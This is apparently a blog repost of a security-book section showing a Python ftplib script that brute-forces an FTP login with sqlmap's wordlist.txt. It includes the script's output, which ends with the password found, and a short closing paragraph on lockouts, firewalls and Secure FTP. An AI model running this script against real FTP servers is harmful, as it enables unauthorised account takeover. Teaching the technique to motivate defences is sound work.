The settings for a
typical FTP service daemon do not monitor the number of times that a password
error has been entered. The “wordlist.txt” file provided by sqlmap can be used
as a data dictionary to find the password through repetitive login attempts.
Python provides an “ftplib” module that can be used for the FTP service.
Figure 15-1 FTP Password Cracking
For convenience, the ID is assumed to be already known.
Find the password and move it to the front of the “wordlist.txt” file. Since
the password is located toward the end of the file, it can take a long time to
find it. When the FTP login fails, a “530 User cannot log in” message is
returned, and Python generates an exception. If login succeeds, a “220 User
logged in” message is printed. Now Python has an authenticated session and can
perform the following actions.
from ftplib import FTP
wordlist = open(‘wordlist.txt’,
‘r’) #(1)
user_login = "server"
def getPassword(password): #(2)
try:
ftp = FTP("server") #(3)
ftp.login(user_login,password) #(4)
print "user
password:", password
return True
except Exception: #(5)
return False
passwords = wordlist.readlines()
for password in passwords:
password = password.strip()
print "test
password:", password
if(getPassword(password)): #(6)
break
wordlist.close()
|
Python provides a
simple mechanism to login and establish an FTP connection. Internally, the
“ftplib” module provides a number of functions that can be executed using the
Java and C languages. Users can easily access FTP using simple import
statements. A detailed processing of the example is as follows.
(1) Opening File: Open the “wordlist.txt” file.
(2) Declaring Function: Make an FTP connection with the server PC and declare the login fuction.
(3) Connecting FTP: Make an FTP connection with the server PC. Enter the IP and DNS as
arguments.
(4) Login: Try to login with the arguments that were previously received. If the
login succeeds, the program will execute the next line. If the login fails,
program will result in an exception.
(5) Exception: In the case of an abnormal login, an exception occurs, and the example
above returns “false”.
(6) Executing Function: Execute the “getPassword” function. The program passes the data from
“wordlist.txt” as an argument. If the function returns “true”, the loop will be
terminated.
If the system does
not limit the number of times that a password error can occur, then the system
is vulnerable to a Password Cracking attack. The administrator must apply the
system security settings and should install security equipment, such as a
firewall, IPS, or IDS. Therefore, refrain from using typical FTP settings and
use a more secure protocol, such as Secure FTP.
test password:
!
test password:
! Keeper
test password:
!!
test password:
!!!
test password:
!!!!!!
test password:
!!!!!!!!!!!!!!!!!!!!
test password:
!!!!!2
test password:
!!!!lax7890
test password:
!!!!very8989
test password:
!!!111sssMMM
test password:
!!!234what
test password:
!!!666!!!
test password:
!!!666666!!!
test password:
!!!angst66
test password:
!!!gerard!!!
test password:
!!!sara
test password:
server
user password: server
|
Figure 15-2 FTP Passwrod Cracking Result
No comments:
Post a Comment